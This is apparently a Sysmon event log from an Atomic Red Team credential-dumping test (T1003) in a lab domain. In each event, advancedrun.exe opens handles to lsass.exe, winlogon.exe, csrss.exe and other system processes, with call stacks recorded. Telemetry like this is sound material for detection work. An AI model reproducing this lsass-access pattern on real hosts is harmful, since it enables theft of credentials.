17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003953119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.543{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7E03-000000002702}49363628C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:28:56.528{834264DD-ED58-61EA-7F03-000000002702}55286060C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003953108Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
